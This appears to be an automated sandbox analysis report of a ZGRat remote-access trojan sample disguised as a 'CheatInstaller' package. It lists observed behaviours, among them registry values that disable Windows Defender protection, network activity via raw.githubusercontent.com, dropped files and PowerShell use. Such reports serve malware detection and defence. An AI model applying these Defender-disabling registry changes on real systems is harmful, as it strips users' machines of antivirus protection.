SHA512 3edf26ba7095e2532cd0257f50a65c9f71eb85b768f27237f0bf538409cea74e12bbcec01bc0120f9d53bfb6a94b4bac21a17595e259ee23d1a36fbf4615c830

memory/2512-3629-0x0000000002E20000-0x0000000002EA0000-memory.dmp

memory/2512-3628-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-18 19:06

Reported

2024-03-18 19:17

Platform

win10-20240221-en

Max time kernel

92s

Max time network

207s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\7zS8628.tmp\Install_YTTCHTs.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\syswow64\MsiExec.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 C:\Windows\syswow64\MsiExec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI9B37.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI29A4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9A9A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA157.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA282.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA90A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAC9F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4C3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9CC1.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAB73.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI4C4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9BB5.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e579a11.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA99A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAC8E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI128.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI29E4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA97A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAB04.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI29A3.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA91B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA9BA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIAB93.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e579a0d.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e579a0d.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9C33.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9D3F.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIA1F4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI29A5.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" C:\Windows\syswow64\MsiExec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\syswow64\MsiExec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\syswow64\MsiExec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1A\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1b C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config C:\Windows\syswow64\MsiExec.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
